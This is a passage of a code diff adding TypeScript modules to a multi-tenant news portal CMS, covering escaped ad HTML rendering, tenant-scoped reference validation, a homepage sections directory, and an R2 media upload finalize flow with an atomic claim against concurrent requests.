+ * attributes `ads-directory.ts`'s `renderAdHtml` uses.
+ */
+export function renderAdPlacementHtml(
+  ad: ActiveAdPlacementForRendering
+): string {
+  const altText = ad.mediaAltText ?? ad.name;
+  const image = `<img src="${escapeHtml(ad.mediaPublicUrl)}" alt="${escapeHtml(altText)}">`;
+
+  if (!ad.linkUrl) {
+    return `<div class="ad">${image}</div>`;
+  }
+
+  return `<div class="ad"><a href="${escapeHtml(ad.linkUrl)}" rel="sponsored noopener noreferrer" target="_blank">${image}</a></div>`;
+}
+
+/**
+ * Orchestrates the public rendering path end to end for one placement:
+ * fetch the eligible-active pool (`listActiveAdPlacementsForRendering`),
+ * cap/order it per the placement preset's `maxItems` and each row's own
+ * `rotationMode` (`ad-placement-rotation.ts`'s `selectAdsForRotation`), then
+ * render each survivor (`renderAdPlacementHtml`). The rotation mode used
+ * for the whole selection is read from the FIRST eligible row (ordered by
+ * `created_at DESC` from the underlying query) — an admin configuring
+ * multiple ads for the same placement is expected to give them the same
+ * `rotationMode`; this issue does not model a separate placement-key-wide
+ * rotation setting distinct from the per-row field. Falls back to
+ * `"latest"` when the pool is empty (irrelevant — nothing to select).
+ */
+export async function selectAndRenderActiveAdsForPlacement(
+  tx: Bun.SQL,
+  tenantId: string,
+  placementKey: AdPlacementKey,
+  now: Date = new Date()
+): Promise<string[]> {
+  const eligible = await listActiveAdPlacementsForRendering(
+    tx,
+    tenantId,
+    placementKey,
+    now
+  );
+
+  if (eligible.length === 0) {
+    return [];
+  }
+
+  const rotationMode = eligible[0]!.rotationMode;
+  const preset = AD_PLACEMENT_PRESETS[placementKey];
+
+  const selected = selectAdsForRotation<
+    ActiveAdPlacementForRendering & AdRotationCandidate
+  >(eligible, rotationMode, preset.maxItems);
+
+  return selected.map((ad) => renderAdPlacementHtml(ad));
+}

--- a/src/modules/news-portal/application/ad-placement-reference-validation.ts
+++ b/src/modules/news-portal/application/ad-placement-reference-validation.ts
@@ -1,0 +1,79 @@
+/**
+ * Application-layer existence/ownership/safety check for a news portal ad
+ * placement's `mediaObjectId` (Issue #638) — the domain validator
+ * (`../domain/ad-placement-policy.ts`) only checks shape (well-formed
+ * UUID); this checks that the referenced media object actually exists,
+ * belongs to the SAME tenant, is a verified/attached R2 object safe to
+ * reference publicly, and (defense in depth) has a MIME type the target
+ * placement allows. Same "shape in the pure validator, existence in an
+ * application-layer gate called right before write" convention
+ * `news-media-reference-gate.ts` (Issue #636) and `homepage-section-
+ * reference-validation.ts` (Issue #637) already established.
+ *
+ * Unlike `blog_content`'s Issue #636 gate, this is deliberately
+ * UNCONDITIONAL — no full-online-R2-mode check — for the exact same reason
+ * `homepage-section-reference-validation.ts` is unconditional: this is a
+ * brand-new table with zero pre-existing rows, so there is no legacy
+ * free-URL shape to stay backward compatible with (see migration 048's
+ * header comment).
+ *
+ * This lives in `news_portal`'s OWN application layer, not behind a
+ * `_shared/ports/` capability — `fetchNewsMediaObjectById`/
+ * `isNewsMediaObjectSafeForPublicReference` are this module's OWN code
+ * (`news-media-object-directory.ts`, Issue #633), not a cross-module
+ * import, exactly like `homepage-section-reference-validation.ts`'s
+ * `mediaObjectIds` (`gallery_block`) check.
+ */
+import type { AdPlacementKey } from "../domain/ad-placement-policy";
+import { AD_PLACEMENT_PRESETS } from "../domain/ad-placement-policy";
+import {
+  fetchNewsMediaObjectById,
+  isNewsMediaObjectSafeForPublicReference
+} from "./news-media-object-directory";
+
+export type AdPlacementReferenceValidationError = {
+  field: string;
+  message: string;
+};
+
+export type AdPlacementReferenceValidationResult =
+  | { valid: true }
+  | { valid: false; errors: AdPlacementReferenceValidationError[] };
+
+/** Runs inside the caller's own tenant-scoped transaction (the route handler's `withTenant` `tx`). */
+export async function validateAdPlacementMediaReference(
+  tx: Bun.SQL,
+  tenantId: string,
+  mediaObjectId: string,
+  placementKey: AdPlacementKey
+): Promise<AdPlacementReferenceValidationResult> {
+  const media = await fetchNewsMediaObjectById(tx, tenantId, mediaObjectId);
+
+  if (!media || !isNewsMediaObjectSafeForPublicReference(media.status)) {
+    return {
+      valid: false,
+      errors: [
+        {
+          field: "mediaObjectId",
+          message: `mediaObjectId "${mediaObjectId}" does not exist, does not belong to this tenant, or is not a verified R2 media object.`
+        }
+      ]
+    };
+  }
+
+  const preset = AD_PLACEMENT_PRESETS[placementKey];
+
+  if (!preset.allowedMediaTypes.includes(media.mimeType)) {
+    return {
+      valid: false,
+      errors: [
+        {
+          field: "mediaObjectId",
+          message: `mediaObjectId "${mediaObjectId}" has mime type "${media.mimeType}", which is not allowed for placement "${placementKey}" (allowed: ${preset.allowedMediaTypes.join(", ")}).`
+        }
+      ]
+    };
+  }
+
+  return { valid: true };
+}

--- a/src/modules/news-portal/application/homepage-section-directory.ts
+++ b/src/modules/news-portal/application/homepage-section-directory.ts
@@ -1,0 +1,199 @@
+import type {
+  CreateHomepageSectionInput,
+  HomepageSectionType,
+  UpdateHomepageSectionInput
+} from "../domain/homepage-section-policy";
+
+/**
+ * Read/write query module for `awcms_news_portal_homepage_sections`
+ * (Issue #637) — same "one directory, reads and writes" convention as
+ * `ads-directory.ts`/`blog-taxonomy-directory.ts`. The column list is
+ * repeated literally at each query site (not factored into a shared
+ * fragment) — same convention every other directory module in this repo
+ * uses (see `tenant-domain-directory.ts`'s own header comment), so every
+ * query stays a single self-contained tagged template.
+ */
+export type HomepageSectionView = {
+  id: string;
+  tenantId: string;
+  sectionKey: string;
+  sectionType: HomepageSectionType;
+  title: string | null;
+  config: Record<string, unknown>;
+  sortOrder: number;
+  isEnabled: boolean;
+  startsAt: Date | null;
+  endsAt: Date | null;
+  createdAt: Date;
+  updatedAt: Date;
+  deletedAt: Date | null;
+  deletedBy: string | null;
+  deleteReason: string | null;
+};
+
+type HomepageSectionRow = {
+  id: string;
+  tenant_id: string;
+  section_key: string;
+  section_type: HomepageSectionType;
+  title: string | null;
+  config_json: Record<string, unknown>;
+  sort_order: number;
+  is_enabled: boolean;
+  starts_at: Date | null;
+  ends_at: Date | null;
+  created_at: Date;
+  updated_at: Date;
+  deleted_at: Date | null;
+  deleted_by: string | null;
+  delete_reason: string | null;
+};
+
+function toView(row: HomepageSectionRow): HomepageSectionView {
+  return {
+    id: row.id,
+    tenantId: row.tenant_id,
+    sectionKey: row.section_key,
+    sectionType: row.section_type,
+    title: row.title,
+    config: row.config_json,
+    sortOrder: row.sort_order,
+    isEnabled: row.is_enabled,
+    startsAt: row.starts_at,
+    endsAt: row.ends_at,
+    createdAt: row.created_at,
+    updatedAt: row.updated_at,
+    deletedAt: row.deleted_at,
+    deletedBy: row.deleted_by,
+    deleteReason: row.delete_reason
+  };
+}
+
+export async function createHomepageSection(
+  tx: Bun.SQL,
+  tenantId: string,
+  input: CreateHomepageSectionInput
+): Promise<HomepageSectionView> {
+  const rows = (await tx`
+    INSERT INTO awcms_news_portal_homepage_sections
+      (tenant_id, section_key, section_type, title, config_json, sort_order,
+       is_enabled, starts_at, ends_at)
+    VALUES (
+      ${tenantId}, ${input.sectionKey}, ${input.sectionType}, ${input.title},
+      ${input.config}, ${input.sortOrder}, ${input.isEnabled}, ${input.startsAt},
+      ${input.endsAt}
+    )
+    RETURNING id, tenant_id, section_key, section_type, title, config_json,
+      sort_order, is_enabled, starts_at, ends_at, created_at, updated_at,
+      deleted_at, deleted_by, delete_reason
+  `) as HomepageSectionRow[];
+
+  return toView(rows[0]!);
+}
+
+export async function fetchHomepageSectionById(
+  tx: Bun.SQL,
+  tenantId: string,
+  id: string
+): Promise<HomepageSectionView | null> {
+  const rows = (await tx`
+    SELECT id, tenant_id, section_key, section_type, title, config_json,
+      sort_order, is_enabled, starts_at, ends_at, created_at, updated_at,
+      deleted_at, deleted_by, delete_reason
+    FROM awcms_news_portal_homepage_sections
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NULL
+  `) as HomepageSectionRow[];
+
+  const row = rows[0];
+  return row ? toView(row) : null;
+}
+
+/** Admin listing — every non-deleted section (enabled or not, in/out of schedule window), ordered for the reorder UI. */
+export async function listHomepageSections(
+  tx: Bun.SQL,
+  tenantId: string
+): Promise<HomepageSectionView[]> {
+  const rows = (await tx`
+    SELECT id, tenant_id, section_key, section_type, title, config_json,
+      sort_order, is_enabled, starts_at, ends_at, created_at, updated_at,
+      deleted_at, deleted_by, delete_reason
+    FROM awcms_news_portal_homepage_sections
+    WHERE tenant_id = ${tenantId} AND deleted_at IS NULL
+    ORDER BY sort_order ASC, created_at ASC
+    LIMIT 200
+  `) as HomepageSectionRow[];
+
+  return rows.map(toView);
+}
+
+export async function updateHomepageSection(
+  tx: Bun.SQL,
+  tenantId: string,
+  id: string,
+  input: UpdateHomepageSectionInput
+): Promise<HomepageSectionView | null> {
+  const rows = (await tx`
+    UPDATE awcms_news_portal_homepage_sections
+    SET title = CASE WHEN ${input.title === undefined} THEN title ELSE ${input.title ?? null} END,
+        config_json = COALESCE(${input.config ?? null}, config_json),
+        sort_order = COALESCE(${input.sortOrder ?? null}, sort_order),
+        is_enabled = COALESCE(${input.isEnabled ?? null}, is_enabled),
+        starts_at = CASE WHEN ${input.startsAt === undefined} THEN starts_at ELSE ${input.startsAt ?? null} END,
+        ends_at = CASE WHEN ${input.endsAt === undefined} THEN ends_at ELSE ${input.endsAt ?? null} END,
+        updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NULL
+    RETURNING id, tenant_id, section_key, section_type, title, config_json,
+      sort_order, is_enabled, starts_at, ends_at, created_at, updated_at,
+      deleted_at, deleted_by, delete_reason
+  `) as HomepageSectionRow[];
+
+  return rows[0] ? toView(rows[0]) : null;
+}
+
+export async function softDeleteHomepageSection(
+  tx: Bun.SQL,
+  tenantId: string,
+  actorTenantUserId: string,
+  id: string,
+  reason: string
+): Promise<boolean> {
+  const rows = await tx`
+    UPDATE awcms_news_portal_homepage_sections
+    SET deleted_at = now(), deleted_by = ${actorTenantUserId}, delete_reason = ${reason},
+        updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NULL
+    RETURNING id
+  `;
+
+  return rows.length > 0;
+}
+
+/**
+ * Public-safe query for `/news` rendering — enabled, non-deleted, and
+ * within its schedule window (`starts_at`/`ends_at`, both optional bounds)
+ * as of `now`, ordered for display. Callers still MUST resolve/validate
+ * every reference in `config` (post ids, category slugs, media object ids)
+ * at render time via `homepage-section-rendering.ts` — a section existing
+ * and being "active" does not by itself mean everything it references is
+ * still public/verified (e.g. a curated post could have been unpublished
+ * since the section was configured).
+ */
+export async function listActiveHomepageSectionsForRendering(
+  tx: Bun.SQL,
+  tenantId: string,
+  now: Date = new Date()
+): Promise<HomepageSectionView[]> {
+  const rows = (await tx`
+    SELECT id, tenant_id, section_key, section_type, title, config_json,
+      sort_order, is_enabled, starts_at, ends_at, created_at, updated_at,
+      deleted_at, deleted_by, delete_reason
+    FROM awcms_news_portal_homepage_sections
+    WHERE tenant_id = ${tenantId} AND deleted_at IS NULL AND is_enabled = true
+      AND (starts_at IS NULL OR starts_at <= ${now})
+      AND (ends_at IS NULL OR ends_at > ${now})
+    ORDER BY sort_order ASC, created_at ASC
+    LIMIT 50
+  `) as HomepageSectionRow[];
+
+  return rows.map(toView);
+}

--- a/src/modules/news-portal/application/homepage-section-reference-validation.ts
+++ b/src/modules/news-portal/application/homepage-section-reference-validation.ts
@@ -1,0 +1,186 @@
+/**
+ * Application-layer existence/ownership checks for homepage section
+ * `config_json` references (Issue #637) — the domain validator
+ * (`homepage-section-policy.ts`) only checks shape (UUID format, array
+ * bounds); this checks that every referenced id/slug actually exists,
+ * belongs to the SAME tenant, and (for media) is a verified R2 object.
+ * Same "shape in the pure validator, existence in an application-layer gate
+ * called right before write" convention `news-media-reference-gate.ts`
+ * (Issue #636) and `countExistingTerms` (Issue #539) already established.
+ *
+ * Deliberately unconditional — unlike #636's gate (which only activates
+ * when full-online R2-only mode is active for the tenant, to stay backward
+ * compatible with pre-existing non-R2 content), homepage sections are a
+ * brand-new table with zero pre-existing rows: there is no legacy shape to
+ * stay compatible with, so every reference is validated every time,
+ * regardless of the tenant's R2-only mode status.
+ *
+ * A reference to another tenant's post/term/media object resolves to
+ * "not found" here (never "found but belongs to someone else") — the
+ * fetch functions this calls are themselves tenant-scoped, so a
+ * cross-tenant id is indistinguishable from a nonexistent one.
+ *
+ * Issue #681 (epic #679, platform-hardening) — `postId`/`postIds`/
+ * `categorySlugs` checks previously imported `blog-content/application/
+ * blog-post-directory.ts`/`public-blog-directory.ts` directly, a genuine
+ * `news_portal` application-layer import of `blog_content`'s
+ * implementation. Both are now accessed only through `_shared/ports/
+ * public-content-port.ts`'s `PublicContentPort` interface, injected by
+ * the caller (route handler) via the concrete adapter
+ * (`blog-content/application/public-content-port-adapter.ts`).
+ * `mediaObjectIds` (`gallery_block`) is UNCHANGED — `news-media-object-
+ * directory.ts` is this module's OWN code, not a cross-module import.
+ */
+import type { HomepageSectionType } from "../domain/homepage-section-policy";
+import type { PublicContentPort } from "../../_shared/ports/public-content-port";
+import {
+  fetchNewsMediaObjectById,
+  isNewsMediaObjectSafeForPublicReference
+} from "./news-media-object-directory";
+
+export type HomepageSectionReferenceValidationError = {
+  field: string;
+  message: string;
+};
+
+export type HomepageSectionReferenceValidationResult =
+  | { valid: true }
+  | { valid: false; errors: HomepageSectionReferenceValidationError[] };
+
+async function validatePostId(
+  tx: Bun.SQL,
+  tenantId: string,
+  postId: string,
+  contentPort: PublicContentPort,
+  errors: HomepageSectionReferenceValidationError[]
+): Promise<void> {
+  const exists = await contentPort.postExists(tx, tenantId, postId);
+
+  if (!exists) {
+    errors.push({
+      field: "config.postId",
+      message: `config.postId "${postId}" does not exist or does not belong to this tenant.`
+    });
+  }
+}
+
+async function validatePostIds(
+  tx: Bun.SQL,
+  tenantId: string,
+  postIds: readonly string[],
+  contentPort: PublicContentPort,
+  errors: HomepageSectionReferenceValidationError[]
+): Promise<void> {
+  for (const postId of new Set(postIds)) {
+    const exists = await contentPort.postExists(tx, tenantId, postId);
+
+    if (!exists) {
+      errors.push({
+        field: "config.postIds",
+        message: `config.postIds references "${postId}", which does not exist or does not belong to this tenant.`
+      });
+    }
+  }
+}
+
+async function validateCategorySlugs(
+  tx: Bun.SQL,
+  tenantId: string,
+  categorySlugs: readonly string[],
+  contentPort: PublicContentPort,
+  errors: HomepageSectionReferenceValidationError[]
+): Promise<void> {
+  for (const slug of new Set(categorySlugs)) {
+    const category = await contentPort.fetchCategoryBySlug(tx, tenantId, slug);
+
+    if (!category) {
+      errors.push({
+        field: "config.categorySlugs",
+        message: `config.categorySlugs references "${slug}", which does not exist as a category for this tenant.`
+      });
+    }
+  }
+}
+
+async function validateMediaObjectIds(
+  tx: Bun.SQL,
+  tenantId: string,
+  mediaObjectIds: readonly string[],
+  errors: HomepageSectionReferenceValidationError[]
+): Promise<void> {
+  for (const mediaObjectId of new Set(mediaObjectIds)) {
+    const media = await fetchNewsMediaObjectById(tx, tenantId, mediaObjectId);
+
+    if (!media || !isNewsMediaObjectSafeForPublicReference(media.status)) {
+      errors.push({
+        field: "config.mediaObjectIds",
+        message: `config.mediaObjectIds references "${mediaObjectId}", which does not exist, does not belong to this tenant, or is not a verified R2 media object.`
+      });
+    }
+  }
+}
+
+/** Runs inside the caller's own tenant-scoped transaction (same `tx` the route handler already opened via `withTenant`). `contentPort` is the caller-injected `PublicContentPort` implementation. */
+export async function validateHomepageSectionReferences(
+  tx: Bun.SQL,
+  tenantId: string,
+  sectionType: HomepageSectionType,
+  config: Record<string, unknown>,
+  contentPort: PublicContentPort
+): Promise<HomepageSectionReferenceValidationResult> {
+  const errors: HomepageSectionReferenceValidationError[] = [];
+
+  switch (sectionType) {
+    case "headline":
+      await validatePostId(
+        tx,
+        tenantId,
+        config.postId as string,
+        contentPort,
+        errors
+      );
+      break;
+    case "featured_posts":
+    case "editor_picks":
+      await validatePostIds(
+        tx,
+        tenantId,
+        config.postIds as string[],
+        contentPort,
+        errors
+      );
+      break;
+    case "category_grid":
+      await validateCategorySlugs(
+        tx,
+        tenantId,
+        config.categorySlugs as string[],
+        contentPort,
+        errors
+      );
+      break;
+    case "gallery_block":
+      await validateMediaObjectIds(
+        tx,
+        tenantId,
+        config.mediaObjectIds as string[],
+        errors
+      );
+      break;
+    case "latest_posts": {
+      const categorySlug = config.categorySlug as string | null;
+      if (categorySlug) {
+        await validateCategorySlugs(
+          tx,
+          tenantId,
+          [categorySlug],
+          contentPort,
+          errors
+        );
+      }
+      break;
+    }
+  }
+
+  return errors.length > 0 ? { valid: false, errors } : { valid: true };
+}

--- a/src/modules/news-portal/application/news-media-finalize-upload-session.ts
+++ b/src/modules/news-portal/application/news-media-finalize-upload-session.ts
@@ -1,0 +1,406 @@
+/**
+ * Finalize orchestration for the direct-to-R2 presigned upload flow (Issue
+ * #634). Extracted out of the route handler
+ * (`pages/api/v1/media/news-images/upload-sessions/[id]/finalize.ts`) so
+ * the route stays thin (`awcms-new-endpoint` skill: "route hanya
+ * orkestrasi") and so integration tests can exercise this exact logic
+ * against a real database with an INJECTED R2 client (a real
+ * `Bun.S3Client` pointed at a local fake HTTP server, same convention
+ * `tests/integration/object-dispatch.integration.test.ts` already
+ * established for `sync-storage`) — the route itself does not expose a
+ * seam for that, but a plain async function does, via `deps.createR2Client`.
+ *
+ * THIS is the function that closes the security-auditor Critical finding
+ * on Issue #631: it never promotes a row past `HEAD` alone.
+ * `verifyNewsMediaR2Object` (called below, between two separate
+ * `withTenant` transactions) performs a full, size-capped `GET` + magic-byte
+ * MIME sniffing + server-side SHA-256 checksum before any acceptance
+ * decision is made (ADR-0006: the R2 calls happen strictly outside any DB
+ * transaction).
+ *
+ * ## Atomic claim BEFORE the R2 call (security-auditor High finding, PR #653 review)
+ *
+ * `Idempotency-Key` only dedupes an EXACT key match — it does nothing to
+ * stop N concurrent `finalize` calls against the SAME `objectId`, each
+ * using its OWN distinct key (a normal-looking client retry storm, or a
+ * deliberate cost-amplification attack: every such call used to reach
+ * `verifyNewsMediaR2Object` in parallel, each paying for its own `HEAD`+
+ * full `GET` of the same object). The precheck transaction below now calls
+ * `markNewsMediaObjectUploaded(tx, tenantId, objectId)` (no `sizeBytes`/
+ * `checksumSha256` — those are not known yet) as an ATOMIC CLAIM
+ * (`pending_upload -> uploaded`) BEFORE any R2 call happens. Postgres
+ * serializes concurrent `UPDATE`s against the same row, so exactly one
+ * concurrent caller's claim succeeds; every other caller's `UPDATE`
+ * matches zero rows (the row is no longer `pending_upload`) and gets `null`
+ * back immediately — a cheap `409`, no R2 call ever attempted. If the R2
+ * call itself then fails for a transient/infra reason (not a content
+ * rejection), the claim is reverted (`revertNewsMediaObjectUploadClaim`)
+ * so the session stays retryable rather than being stuck in `uploaded`
+ * forever.
+ */
+import { fail, jsonResponse, ok } from "../../_shared/api-response";
+import { withTenant } from "../../../lib/database/tenant-context";
+import { authorizeInTransaction } from "../../identity-access/application/access-guard";
+import { log } from "../../../lib/logging/logger";
+import { recordAuditEvent } from "../../logging/application/audit-log";
+import {
+  computeRequestHash,
+  findIdempotencyRecord,
+  saveIdempotencyRecord
+} from "../../_shared/idempotency";
+import type { NewsMediaR2Config } from "../domain/news-media-r2-config";
+import {
+  fetchNewsMediaObjectById,
+  markNewsMediaObjectFailed,
+  markNewsMediaObjectUploaded,
+  markNewsMediaObjectVerified,
+  revertNewsMediaObjectUploadClaim
+} from "./news-media-object-directory";
+import {
+  createNewsMediaR2Client,
+  type NewsMediaR2Client
+} from "../infrastructure/news-media-r2-client";
+import { verifyNewsMediaR2Object } from "./news-media-r2-verification";
+
+const VERIFY_GUARD = {
+  moduleKey: "news_portal",
+  activityCode: "media",
+  action: "verify" as const
+};
+
+const IDEMPOTENCY_SCOPE = "news_media_upload_session_finalize";
+
+type PrecheckResult =
+  | { kind: "response"; response: Response }
+  | {
+      kind: "proceed";
+      objectId: string;
+      objectKey: string;
+      claimedMimeType: string;
+      actorTenantUserId: string;
+    };
+
+export type FinalizeNewsMediaUploadSessionInput = {
+  tenantId: string;
+  objectId: string;
+  tokenHash: string;
+  idempotencyKey: string;
+  claimedChecksumSha256: string | null;
+  now: Date;
+  correlationId?: string;
+};
+
+export type FinalizeNewsMediaUploadSessionDeps = {
+  sql: Bun.SQL;
+  config: NewsMediaR2Config;
+  /** Test-only injection point — defaults to a real `Bun.S3Client`-backed client built from `deps.config`. */
+  createR2Client?: (config: NewsMediaR2Config) => NewsMediaR2Client;
+};
+
+function defaultR2ClientFactory(config: NewsMediaR2Config): NewsMediaR2Client {
+  return createNewsMediaR2Client({
+    accountId: config.accountId,
+    accessKeyId: config.accessKeyId,
+    secretAccessKey: config.secretAccessKey,
+    bucket: config.bucket
+  });
+}
+
+export async function finalizeNewsMediaUploadSession(
+  input: FinalizeNewsMediaUploadSessionInput,
+  deps: FinalizeNewsMediaUploadSessionDeps
+): Promise<Response> {
+  const { tenantId, objectId, tokenHash, idempotencyKey, now, correlationId } =
+    input;
+  const claimedChecksumSha256 = input.claimedChecksumSha256;
+  const requestHash = computeRequestHash({ objectId, claimedChecksumSha256 });
+  const { sql, config } = deps;
+  const createR2Client = deps.createR2Client ?? defaultR2ClientFactory;
+
+  const precheck = await withTenant<PrecheckResult>(
+    sql,
+    tenantId,
+    async (tx) => {
+      const auth = await authorizeInTransaction(
+        tx,
+        tenantId,
+        tokenHash,
+        now,
+        VERIFY_GUARD
+      );
+
+      if (!auth.allowed) {
+        return { kind: "response", response: auth.denied };
+      }
+
+      const existingIdempotency = await findIdempotencyRecord(
+        tx,
+        tenantId,
+        IDEMPOTENCY_SCOPE,
+        idempotencyKey
+      );
+
+      if (existingIdempotency) {
+        if (existingIdempotency.requestHash !== requestHash) {
+          return {
+            kind: "response",
+            response: fail(
+              409,
+              "IDEMPOTENCY_CONFLICT",
+              "Idempotency-Key was already used with a different request."
+            )
+          };
+        }
+
+        return {
+          kind: "response",
+          response: jsonResponse(existingIdempotency.responseBody, {
+            status: existingIdempotency.responseStatus
+          })
+        };
+      }
+
+      const row = await fetchNewsMediaObjectById(tx, tenantId, objectId);
+
+      if (!row) {
+        return {
+          kind: "response",
+          response: fail(404, "RESOURCE_NOT_FOUND", "Upload session not found.")
+        };
+      }
+
+      if (row.status !== "pending_upload") {
+        return {
+          kind: "response",
+          response: fail(
+            409,
+            "INVALID_STATUS_TRANSITION",
+            `Cannot finalize an upload session in status "${row.status}".`
+          )
+        };
+      }
+
+      const expiresAtMs =
+        row.createdAt.getTime() + config.presignedUploadTtlSeconds * 1000;
+
+      if (now.getTime() > expiresAtMs) {
+        await markNewsMediaObjectFailed(tx, tenantId, objectId);
+        await recordAuditEvent(tx, {
+          tenantId,
+          actorTenantUserId: auth.context.tenantUserId,
+          moduleKey: "news_portal",
+          action: "news_media.object.finalize_rejected",
+          resourceType: "news_media_object",
+          resourceId: objectId,
+          severity: "warning",
+          message: `News media finalize rejected: upload session expired (${row.objectKey}).`,
+          attributes: { objectKey: row.objectKey, reason: "session_expired" },
+          correlationId
+        });
+
+        return {
+          kind: "response",
+          response: fail(
+            409,
+            "UPLOAD_SESSION_EXPIRED",
+            "Upload session has expired; start a new upload session."
+          )
+        };
+      }
+
+      // Atomic claim — see this module's header. Must happen BEFORE any R2
+      // call, and BEFORE this transaction commits, so Postgres's own
+      // row-update serialization is what does the mutual exclusion.
+      const claimed = await markNewsMediaObjectUploaded(tx, tenantId, objectId);
+
+      if (!claimed) {
+        return {
+          kind: "response",
+          response: fail(
+            409,
+            "INVALID_STATUS_TRANSITION",
+            "Upload session is already being finalized (or was already finalized) by another request."
+          )
+        };
+      }
+
+      return {
+        kind: "proceed",
+        objectId: row.id,
+        objectKey: row.objectKey,
+        claimedMimeType: row.mimeType,
+        actorTenantUserId: auth.context.tenantUserId
+      };
+    }
+  );
+
+  if (precheck.kind === "response") {
+    return precheck.response;
+  }
+
+  // Strictly outside any DB transaction (ADR-0006) — real R2 network calls.
+  // At this point THIS call, and only this call, holds the `uploaded` claim
+  // for this object — no other concurrent `finalize` call can reach here
+  // for the same objectId until this one reverts or resolves it.
+  const r2Client = createR2Client(config);
+
+  // Reverts the claim (`uploaded -> pending_upload`) — called both for the
+  // handled `provider_error` outcome AND for any UNEXPECTED exception
+  // between the claim commit and this call's own resolution (reviewer +
+  // security-auditor feedback, PR #653 re-review): a bug, an OOM, or an
+  // unforeseen throw from `verifyNewsMediaR2Object`/the resolving
+  // transaction below would otherwise leave the row permanently stuck at
+  // `uploaded` (no client-triggerable recovery — both `finalize` and
+  // `cancel` require `pending_upload`). Best-effort: if the revert itself
+  // fails, that failure is only logged — it never masks/replaces the
+  // caller's own error path.
+  const revertClaim = async () => {
+    await withTenant(sql, tenantId, (tx) =>
+      revertNewsMediaObjectUploadClaim(tx, tenantId, precheck.objectId)
+    ).catch((revertError) => {
+      log("error", "news-portal.upload-session.finalize.revert_claim_failed", {
+        correlationId,
+        tenantId,
+        objectId: precheck.objectId,
+        error:
+          revertError instanceof Error
+            ? revertError.message
+            : String(revertError)
+      });
+    });
+  };
+
+  let verification: Awaited<ReturnType<typeof verifyNewsMediaR2Object>>;
+
+  try {
+    verification = await verifyNewsMediaR2Object(r2Client, {
+      objectKey: precheck.objectKey,
+      claimedMimeType: precheck.claimedMimeType,
+      allowedMimeTypes: config.allowedMimeTypes,
+      maxUploadBytes: config.maxUploadBytes,
+      claimedChecksumSha256
+    });
+  } catch (error) {
+    log("error", "news-portal.upload-session.finalize.unexpected_error", {
+      correlationId,
+      tenantId,
+      objectId: precheck.objectId,
+      error: error instanceof Error ? error.message : String(error)
+    });
+    await revertClaim();
+    throw error;
+  }
+
+  if (verification.outcome === "provider_error") {
+    log("error", "news-portal.upload-session.finalize.provider_error", {
+      correlationId,
+      tenantId,
+      objectId: precheck.objectId,
+      error: verification.error
+    });
+
+    // Transient/infra failure, not a content rejection — revert the claim
+    // so the session stays retryable instead of being stuck in `uploaded`.
+    await revertClaim();
+
+    return fail(
+      502,
+      "PROVIDER_ERROR",
+      "Unable to verify the uploaded object right now. Try again shortly."
+    );
+  }
+
+  try {
+    return await withTenant(sql, tenantId, async (tx) => {
+      if (verification.outcome === "rejected") {
+        await markNewsMediaObjectFailed(tx, tenantId, precheck.objectId);
+        await recordAuditEvent(tx, {
+          tenantId,
+          actorTenantUserId: precheck.actorTenantUserId,
+          moduleKey: "news_portal",
+          action: "news_media.object.finalize_rejected",
+          resourceType: "news_media_object",
+          resourceId: precheck.objectId,
+          severity: "warning",
+          message: `News media finalize rejected: ${verification.reason} (${precheck.objectKey}).`,
+          attributes: {
+            objectKey: precheck.objectKey,
+            reason: verification.reason
+          },
+          correlationId
+        });
+
+        const rejectedResponse = fail(
+          422,
+          "UPLOAD_VERIFICATION_FAILED",
+          "Uploaded object failed content verification.",
+          {},
+          { reason: verification.reason }
+        );
+        const rejectedBody = await rejectedResponse.clone().json();
+
+        // Store the rejection under this Idempotency-Key too (not just the
+        // success path) — the row is now `failed`, so a same-key/same-payload
+        // retry without this would hit the status guard above instead and
+        // get a DIFFERENT ("Cannot finalize... status failed") response,
+        // breaking the "same key + same request -> replay" idempotency
+        // contract (reviewer feedback, PR #653).
+        await saveIdempotencyRecord(
+          tx,
+          tenantId,
+          IDEMPOTENCY_SCOPE,
+          idempotencyKey,
+          requestHash,
+          422,
+          rejectedBody
+        );
+
+        return rejectedResponse;
+      }
+
+      const verified = await markNewsMediaObjectVerified(
+        tx,
+        tenantId,
+        precheck.actorTenantUserId,
+        precheck.objectId,
+        {
+          sizeBytes: verification.sizeBytes,
+          checksumSha256: verification.checksumSha256
+        },
+        correlationId
+      );
+
+      if (!verified) {
+        return fail(
+          409,
+          "INVALID_STATUS_TRANSITION",
+          "Upload session state changed concurrently; retry."
+        );
+      }
+
+      const successResponse = ok(verified);
+      const successBody = await successResponse.clone().json();
+
+      await saveIdempotencyRecord(
+        tx,
+        tenantId,
+        IDEMPOTENCY_SCOPE,
+        idempotencyKey,
+        requestHash,
+        200,
+        successBody
+      );
+
+      return successResponse;
+    });
+  } catch (error) {
+    log("error", "news-portal.upload-session.finalize.unexpected_error", {
+      correlationId,
+      tenantId,
+      objectId: precheck.objectId,
+      error: error instanceof Error ? error.message : String(error)
+    });
+    await revertClaim();
+    throw error;
+  }
+}

--- a/src/modules/news-portal/application/news-media-object-directory.ts
+++ b/src/modules/news-portal/application/news-media-object-directory.ts
@@ -1,0 +1,963 @@
+import { recordAuditEvent } from "../../logging/application/audit-log";
+import type { NewsMediaR2Config } from "../domain/news-media-r2-config";
+import {
+  buildNewsMediaObjectKey,
+  buildNewsMediaPublicUrl
+} from "../domain/news-media-object-key";
+
+/**
+ * Read/write directory for `awcms_news_media_objects` (Issue #633,
+ * epic `news_portal`) — same "directory holds reads and writes for one
+ * resource" convention as `blog-content/application/blog-post-directory.ts`.
+ * Every function here takes an already tenant-scoped `Bun.SQL`/`Bun.TransactionSQL`
+ * (from `withTenant`, `lib/database/tenant-context.ts`) — none of them open
+ * their own transaction, matching the rest of this repo's directories.
+ *
+ * Out of scope here (Issue #634): actually talking to R2 (presign, HEAD/GET,
+ * streaming PUT) — every status transition below is a plain metadata
+ * UPDATE; the caller is responsible for having done the real R2 work first
+ * (ADR-0006: provider calls never happen inside a DB transaction).
+ *
+ * Audit events are written for exactly the actions the epic's acceptance
+ * criteria require: create, verify, attach, detach, delete, restore, purge
+ * (skill `awcms-audit-log`). The intermediate `pending_upload -> uploaded`
+ * and any `-> orphaned`/`-> failed` transition are logged via the structured
+ * logger only (`src/lib/logging/logger.ts`) — see `markNewsMediaObjectUploaded`/
+ * `markNewsMediaObjectOrphaned`/`markNewsMediaObjectFailed` below for why
